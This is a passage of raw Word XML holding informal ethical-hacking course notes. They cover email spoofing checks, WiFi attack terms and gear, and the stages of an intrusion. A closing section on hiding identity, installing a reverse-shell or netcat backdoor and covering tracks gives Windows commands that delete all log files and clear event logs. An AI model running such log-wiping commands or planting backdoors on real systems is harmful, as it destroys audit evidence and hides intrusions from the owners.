    <w:p w14:paraId="00000666" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>no-reply@it.abc.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000667" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000668" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from a different domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000669" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sankar@xyz.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000066A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000066B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>then it might be spoofed email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000066C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000066D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000066E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">we will have IP mentioned in this field, this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get repeated 4/5 times in the email header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000066F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should be the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000670" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">if the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is different, then it means the sender has used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or he has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sppofed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000671" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000672" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. Authentication PASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000673" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- SPF</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Sender Policy Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000674" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a configuration done in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> email server to restrict who can send email from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000675" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000676" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>if we want to check if SPF record is present for a domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000677" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://www.kitterman.com/spf/validate.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000678" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000679" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000067A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>email spoofing can be possible with the following website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000067B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000067C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- DKIM</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Domain Keys Identified Mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000067D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">it ensures the content of your email remains trusted and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not tampered while communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000067E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000067F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DMARC</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Domain based message </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>authentication,reporting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; conformance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000680" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- it ties two protocols </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dkim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) together with a set of policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000681" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000682" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>the above 3 has to be set as PASS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000683" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">if it says </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000684" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">SPF - fail / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>softfail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hardfail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00000685" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000686" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000687" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. Email header analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000688" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>https://mxtoolbox.com/EmailHeaders.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000689" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000068A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WIFI ATTACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000068B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000068C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>terminoligies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0000068D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000068E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">SSID - Service Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IDentifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000068F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>BSSID - Basic SSID (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mac address)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000690" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Frequency - 2.5 / 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000691" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Channel - it depends on the country and type of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>deviec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which u use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000692" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>AP - Access Point (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Device)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000693" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Security - WEP / WPA / WPA2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000694" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Encryption - AES | TKIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000695" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Lease time - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the time period for which a particular </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is assigned to a MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000696" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000697" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Password Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000698" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Traditional Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000699" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Advanced Approach - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> phishing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000069A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Device - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WIfi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pineapple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000069B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000069C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000069D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000069E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Hardware requirements </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000069F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adaptor - Alfa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adaptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Mobile app - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wigle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000006A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">used for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> war driving</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>18-11-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SSRF \ CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>vanat59182@hypteo.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>sankar@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>STEPS IN ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>1. SOCIAL ENGINEERING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. INFORMATION GATHERING | ENUMERATION | RECONAISSANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. SCANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>4. VULNERABILITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>5. EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>6. PRIVILEDGE ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>7. MAINTAINIG ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>8. COVERING TRACKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A. Before attacker tries to exploit the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Try to mask IP, MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">IP - Proxy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>softwares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Chain proxy, free proxy server, browser extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Software - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hotspotshield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ultrasurf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000006C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">MAC - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Technititum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, SMAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Supported OS - Anonymous OS, Tails OS, - OS should be run as LIVE OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Supported Browser - TOR browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">B. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WHen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> he logs in victim system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- We cannot open application or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>softwares</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> directly from the program menu, we need to use command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Install a BACKDOOR (PHP Reverse shell or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) for future communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Open up any of the public ports or commonly used ports by servers so that our backdoor can use that port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>C. When attacker logs out of victim system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Clear all logs MSINFO32, EVENTVWR.MSC (system logs, app logs, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adminstrative</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> logs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- We can also use CLEARLOGS.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>c:/&gt;del *.log /a /s /q /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">c:/&gt;wevtutil </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>el</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000006D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">This will display all the events and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>incase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if we want to remove our event </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abcde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000006D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">c:/&gt;wevtutil cl </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abcde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000006DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- External Software STELLAR BITRASER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
